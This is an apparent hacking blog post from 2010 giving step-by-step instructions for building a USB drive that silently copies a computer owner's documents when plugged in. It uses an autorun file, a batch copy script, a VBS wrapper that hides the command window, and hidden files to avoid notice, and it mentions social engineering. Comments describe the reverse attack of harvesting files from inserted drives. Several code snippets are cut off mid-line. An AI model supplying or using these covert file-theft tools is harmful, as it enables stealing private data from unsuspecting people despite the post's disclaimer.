hacking

hacking is my passion, if u wanna do some thing interesting u can visit here

My Blog List

just click to see

Your Ad Here

ur ip address is

Sign by Danasoft - Get Your Free Sign

Wednesday, June 2, 2010

How to make flash drive that copy's users files silently and automatically

****** THIS INSTRUCTABLE IS FOR INFORMATION PURPOSES ONLY IT IS ILEGAL TO COPY SOMEONES FILES WITHOUT THEIR PERMISSION I AM NOT RESPONSABLE FOR ANY THING THAT MAY OR MAYNOT HAPPEN IF THIS INFORMATION IS USED IMPROPERLY****************


step 1Materials needed

first  of all u need a usb pen drive  /external hard disk to make this.

step 2Create autorun file for the flash drive
Ok there is no order in the file creation process just that you have all files created and on the flash drive. I will start out with the autorun.inf. This file is used when you insert the flash drive into said computer. Also used to change the thumb drive icon to something more acceptable for social engineering. Here is the code, you will have to open a simple word edi…

step 3Make the file for copy of documents to drive
This is the heart of the flash drive copy I am not going to go through every line of code here but if you have questions just ask or use Google, I will however touch on the main points of the code. Like the last step make sure you use word to make this file save it as file.bat and all files not a word file just like in the picture. Code follows @echo off :: variables /…

step 4Make vb script to run batch file as invisible
This code is very simple it runs the file.bat as a process so it does not show the cmd prompt and everything the batch file is processing Code it with word and save as invisible.vbs All files once again. ______________________________________________________________ CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ________________…

step 5make a batch file to launch vb script and file.batch
ok this batch file does two things, it looks for the invisible.vbs file in the root of the flash drive then loads it with file.bat so file.bat is run with code from vbs file.... neat huh. create with word and save as launch.bat ____________________________ wscript.exe \invisible.vbs file.bat ____________________________

step 6Create folder to save files withing thumb drive.
Go to the root of the thumb drive and create a folder named all that's it for this step. All the documents will be saved in this folder in there separate folders.

step 7put all files in root of drive and try out
Now if you have not put all the files in the root of the flash drive it's time to do that now. One thing you can do is make all the files hidden, so for if some reason they look into the drive they will see an empty drive and not think anything. Now all you should have to do is plug into someones computer and let the thumb drive do its work after the LED is done flashin…

2 comments:

Johnathan Waters said...

You can also do the opposite. Run an invisible script on a computer, and when someone plugs their flash drive into the computer, it will download the files from the flash to the computer. Go to the 11th-fret web site, and click on the flash drive copy. The scripts are included.

Johnathan Waters said...

You can do the opposite too. If you want to get the files off of someone's flash drive, you can run a script that will download the files to from the flash drive to the computer. If you want to see the code for this type of script I recommend the flash drive copy script from the 11th-fret web site.